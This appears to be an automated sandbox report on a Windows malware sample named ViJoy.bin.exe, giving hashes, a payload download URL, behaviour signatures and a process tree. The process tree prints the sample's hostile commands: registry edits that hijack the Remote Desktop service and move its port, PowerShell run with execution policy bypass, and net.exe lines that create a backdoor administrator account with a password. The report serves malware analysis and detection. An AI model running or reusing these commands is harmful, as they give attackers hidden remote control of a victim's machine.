Analysis
-
max time kernel
128s -
max time network
113s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
21-07-2021 08:36
Static task
static1
Behavioral task
behavioral1
Sample
ViJoy.bin.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
ViJoy.bin.exe
Resource
win10v20210410
General
-
Target
ViJoy.bin.exe
-
Size
6.0MB
-
MD5
03051f3c44a2c8d196c95ea458b0aff4
-
SHA1
d19a86e11cccdf978ca2d1455d7026d7879869f7
-
SHA256
555f654fb51e632ba2cf49b865b6de5f5772ffba0229d73021a1c6a6f65dab08
-
SHA512
883e31033107ee9f008d34e84638fca2ee085e6cc7c41a288d1663a31beac7109efe718ab7f38f682c8e01a99736e3832c539c95fd4bf25124fed4c9e9eeba46
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 19 4880 powershell.exe 21 4880 powershell.exe 22 4880 powershell.exe 23 4880 powershell.exe 25 4880 powershell.exe 27 4880 powershell.exe 29 4880 powershell.exe 31 4880 powershell.exe 33 4880 powershell.exe -
Executes dropped EXE 3 IoCs
Processes:
exe1.exeexe2.exeNFWCHK.exepid process 2412 exe1.exe 2396 exe2.exe 3500 NFWCHK.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 4136 4136 -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
exe2.exedescription ioc process File opened for modification \??\PhysicalDrive0 exe2.exe -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI5DA7.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI5DC8.tmp powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_wq0c2djq.mgk.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI5DD9.tmp powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI5D87.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI5DB8.tmp powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_5zuegjl3.xmj.ps1 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 339704ea112ed701 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 21 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 22 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 23 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 25 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3292 powershell.exe 3292 powershell.exe 3292 powershell.exe 4028 powershell.exe 4028 powershell.exe 4028 powershell.exe 4144 powershell.exe 4144 powershell.exe 4144 powershell.exe 4404 powershell.exe 4404 powershell.exe 4404 powershell.exe 3292 powershell.exe 3292 powershell.exe 3292 powershell.exe 4880 powershell.exe 4880 powershell.exe 4880 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 624 624 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3292 powershell.exe Token: SeDebugPrivilege 4028 powershell.exe Token: SeIncreaseQuotaPrivilege 4028 powershell.exe Token: SeSecurityPrivilege 4028 powershell.exe Token: SeTakeOwnershipPrivilege 4028 powershell.exe Token: SeLoadDriverPrivilege 4028 powershell.exe Token: SeSystemProfilePrivilege 4028 powershell.exe Token: SeSystemtimePrivilege 4028 powershell.exe Token: SeProfSingleProcessPrivilege 4028 powershell.exe Token: SeIncBasePriorityPrivilege 4028 powershell.exe Token: SeCreatePagefilePrivilege 4028 powershell.exe Token: SeBackupPrivilege 4028 powershell.exe Token: SeRestorePrivilege 4028 powershell.exe Token: SeShutdownPrivilege 4028 powershell.exe Token: SeDebugPrivilege 4028 powershell.exe Token: SeSystemEnvironmentPrivilege 4028 powershell.exe Token: SeRemoteShutdownPrivilege 4028 powershell.exe Token: SeUndockPrivilege 4028 powershell.exe Token: SeManageVolumePrivilege 4028 powershell.exe Token: 33 4028 powershell.exe Token: 34 4028 powershell.exe Token: 35 4028 powershell.exe Token: 36 4028 powershell.exe Token: SeDebugPrivilege 4144 powershell.exe Token: SeIncreaseQuotaPrivilege 4144 powershell.exe Token: SeSecurityPrivilege 4144 powershell.exe Token: SeTakeOwnershipPrivilege 4144 powershell.exe Token: SeLoadDriverPrivilege 4144 powershell.exe Token: SeSystemProfilePrivilege 4144 powershell.exe Token: SeSystemtimePrivilege 4144 powershell.exe Token: SeProfSingleProcessPrivilege 4144 powershell.exe Token: SeIncBasePriorityPrivilege 4144 powershell.exe Token: SeCreatePagefilePrivilege 4144 powershell.exe Token: SeBackupPrivilege 4144 powershell.exe Token: SeRestorePrivilege 4144 powershell.exe Token: SeShutdownPrivilege 4144 powershell.exe Token: SeDebugPrivilege 4144 powershell.exe Token: SeSystemEnvironmentPrivilege 4144 powershell.exe Token: SeRemoteShutdownPrivilege 4144 powershell.exe Token: SeUndockPrivilege 4144 powershell.exe Token: SeManageVolumePrivilege 4144 powershell.exe Token: 33 4144 powershell.exe Token: 34 4144 powershell.exe Token: 35 4144 powershell.exe Token: 36 4144 powershell.exe Token: SeDebugPrivilege 4404 powershell.exe Token: SeIncreaseQuotaPrivilege 4404 powershell.exe Token: SeSecurityPrivilege 4404 powershell.exe Token: SeTakeOwnershipPrivilege 4404 powershell.exe Token: SeLoadDriverPrivilege 4404 powershell.exe Token: SeSystemProfilePrivilege 4404 powershell.exe Token: SeSystemtimePrivilege 4404 powershell.exe Token: SeProfSingleProcessPrivilege 4404 powershell.exe Token: SeIncBasePriorityPrivilege 4404 powershell.exe Token: SeCreatePagefilePrivilege 4404 powershell.exe Token: SeBackupPrivilege 4404 powershell.exe Token: SeRestorePrivilege 4404 powershell.exe Token: SeShutdownPrivilege 4404 powershell.exe Token: SeDebugPrivilege 4404 powershell.exe Token: SeSystemEnvironmentPrivilege 4404 powershell.exe Token: SeRemoteShutdownPrivilege 4404 powershell.exe Token: SeUndockPrivilege 4404 powershell.exe Token: SeManageVolumePrivilege 4404 powershell.exe Token: 33 4404 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
exe2.exepid process 2396 exe2.exe 2396 exe2.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
ViJoy.bin.exeexe2.exeexe1.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.exedescription pid process target process PID 3904 wrote to memory of 2412 3904 ViJoy.bin.exe exe1.exe PID 3904 wrote to memory of 2412 3904 ViJoy.bin.exe exe1.exe PID 3904 wrote to memory of 2396 3904 ViJoy.bin.exe exe2.exe PID 3904 wrote to memory of 2396 3904 ViJoy.bin.exe exe2.exe PID 3904 wrote to memory of 2396 3904 ViJoy.bin.exe exe2.exe PID 2396 wrote to memory of 3500 2396 exe2.exe NFWCHK.exe PID 2396 wrote to memory of 3500 2396 exe2.exe NFWCHK.exe PID 2412 wrote to memory of 3292 2412 exe1.exe powershell.exe PID 2412 wrote to memory of 3292 2412 exe1.exe powershell.exe PID 3292 wrote to memory of 2460 3292 powershell.exe csc.exe PID 3292 wrote to memory of 2460 3292 powershell.exe csc.exe PID 2460 wrote to memory of 3972 2460 csc.exe cvtres.exe PID 2460 wrote to memory of 3972 2460 csc.exe cvtres.exe PID 3292 wrote to memory of 4028 3292 powershell.exe powershell.exe PID 3292 wrote to memory of 4028 3292 powershell.exe powershell.exe PID 3292 wrote to memory of 4144 3292 powershell.exe powershell.exe PID 3292 wrote to memory of 4144 3292 powershell.exe powershell.exe PID 3292 wrote to memory of 4404 3292 powershell.exe powershell.exe PID 3292 wrote to memory of 4404 3292 powershell.exe powershell.exe PID 3292 wrote to memory of 4824 3292 powershell.exe reg.exe PID 3292 wrote to memory of 4824 3292 powershell.exe reg.exe PID 3292 wrote to memory of 4844 3292 powershell.exe reg.exe PID 3292 wrote to memory of 4844 3292 powershell.exe reg.exe PID 3292 wrote to memory of 4864 3292 powershell.exe reg.exe PID 3292 wrote to memory of 4864 3292 powershell.exe reg.exe PID 3292 wrote to memory of 5044 3292 powershell.exe net.exe PID 3292 wrote to memory of 5044 3292 powershell.exe net.exe PID 5044 wrote to memory of 5064 5044 net.exe net1.exe PID 5044 wrote to memory of 5064 5044 net.exe net1.exe PID 3292 wrote to memory of 5096 3292 powershell.exe cmd.exe PID 3292 wrote to memory of 5096 3292 powershell.exe cmd.exe PID 5096 wrote to memory of 5112 5096 cmd.exe cmd.exe PID 5096 wrote to memory of 5112 5096 cmd.exe cmd.exe PID 5112 wrote to memory of 3960 5112 cmd.exe net.exe PID 5112 wrote to memory of 3960 5112 cmd.exe net.exe PID 3960 wrote to memory of 2684 3960 net.exe net1.exe PID 3960 wrote to memory of 2684 3960 net.exe net1.exe PID 3292 wrote to memory of 3700 3292 powershell.exe cmd.exe PID 3292 wrote to memory of 3700 3292 powershell.exe cmd.exe PID 3700 wrote to memory of 3612 3700 cmd.exe cmd.exe PID 3700 wrote to memory of 3612 3700 cmd.exe cmd.exe PID 3612 wrote to memory of 4112 3612 cmd.exe net.exe PID 3612 wrote to memory of 4112 3612 cmd.exe net.exe PID 4112 wrote to memory of 4124 4112 net.exe net1.exe PID 4112 wrote to memory of 4124 4112 net.exe net1.exe PID 4248 wrote to memory of 4308 4248 cmd.exe net.exe PID 4248 wrote to memory of 4308 4248 cmd.exe net.exe PID 4308 wrote to memory of 4328 4308 net.exe net1.exe PID 4308 wrote to memory of 4328 4308 net.exe net1.exe PID 4348 wrote to memory of 4216 4348 cmd.exe net.exe PID 4348 wrote to memory of 4216 4348 cmd.exe net.exe PID 4216 wrote to memory of 4148 4216 net.exe net1.exe PID 4216 wrote to memory of 4148 4216 net.exe net1.exe PID 4256 wrote to memory of 4000 4256 cmd.exe net.exe PID 4256 wrote to memory of 4000 4256 cmd.exe net.exe PID 4000 wrote to memory of 4428 4000 net.exe net1.exe PID 4000 wrote to memory of 4428 4000 net.exe net1.exe PID 4412 wrote to memory of 4532 4412 cmd.exe net.exe PID 4412 wrote to memory of 4532 4412 cmd.exe net.exe PID 4532 wrote to memory of 4552 4532 net.exe net1.exe PID 4532 wrote to memory of 4552 4532 net.exe net1.exe PID 4580 wrote to memory of 4620 4580 cmd.exe net.exe PID 4580 wrote to memory of 4620 4580 cmd.exe net.exe PID 4620 wrote to memory of 4644 4620 net.exe net1.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe"C:\Users\Admin\AppData\Local\Temp\ViJoy.bin.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Templers\exe2.exe"C:\Users\Admin\AppData\Roaming\Templers\exe2.exe"2⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\Documents\Wondershare\NFWCHK.exeC:\Users\Public\Documents\Wondershare\NFWCHK.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Templers\exe1.exe"C:\Users\Admin\AppData\Roaming\Templers\exe1.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'3⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\trshuemd\trshuemd.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2541.tmp" "c:\Users\Admin\AppData\Local\Temp\trshuemd\CSCB76A0FB192CC42A6896CCCC69F92E773.TMP"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f4⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f4⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr7⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService7⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f4⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc WVXHFeyt /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc WVXHFeyt /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc WVXHFeyt /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc WVXHFeyt1⤵
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc WVXHFeyt2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc WVXHFeyt3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
